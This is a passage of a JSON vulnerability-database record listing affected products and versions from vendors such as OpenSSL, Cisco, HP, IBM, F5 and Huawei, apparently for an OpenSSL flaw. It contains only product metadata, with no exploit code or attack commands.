"trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "10.0-release-p5", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "fortios b0537", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77009.7" }, { "model": "9.1-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "tivoli workload scheduler distributed ga level", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "stunnel", "scope": "ne", "trust": 0.3, "vendor": "stunnel", "version": "5.02" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.1" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.10" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.2" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "messagesight server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "icewall sso dfw certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025308" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.99" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.9" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 